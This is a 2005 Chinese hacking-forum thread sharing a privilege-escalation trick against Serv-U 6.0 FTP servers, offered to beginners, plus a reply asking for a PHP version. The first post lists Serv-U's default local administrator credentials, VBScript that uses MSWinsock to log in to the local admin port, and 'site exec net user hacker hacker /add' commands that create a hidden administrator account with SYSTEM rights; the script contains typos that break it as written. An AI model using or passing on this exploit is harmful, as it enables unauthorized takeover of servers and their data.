黑色海岸线论坛 - Powered by Discuz! Board

标题: Serv-u6.0提权新招！ [打印本页]

作者: Kerberos 时间: 2005-4-21 22:50 标题: Serv-u6.0提权新招！

[这个贴子最后由所谓伊人在 2005/04/22 08:12am 第 1 次编辑]

此贴仅发给与我一样菜的菜鸟看，高手就快闪人吧！
适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。
限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator 密码：#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：
Dim revdata
Dim sendata
Set sock=createobject("MSWinsock.Winsock")
Sock.protocol=0
Sock.connect "127.0.0.1",43958
Sendata="LocalAdministrator"& chr(10) &chr(13)
Sock.senddata snedata
Sendata="#|@$ak#.|k;0@p" &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用"site exec net user hacker hacker /add" "site exec net localgroup administrators hacker /add"
呵呵，就这样系统权限到手了，祝大家好运！
来自：黑防４月份期刊

作者: 飛鳥 时间: 2005-4-22 20:08 标题: Serv-u6.0提权新招！

还有个是PHP页面提升的`~找不到哪个东西捏~~
如果楼主有的话不要吝啬啊`~

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)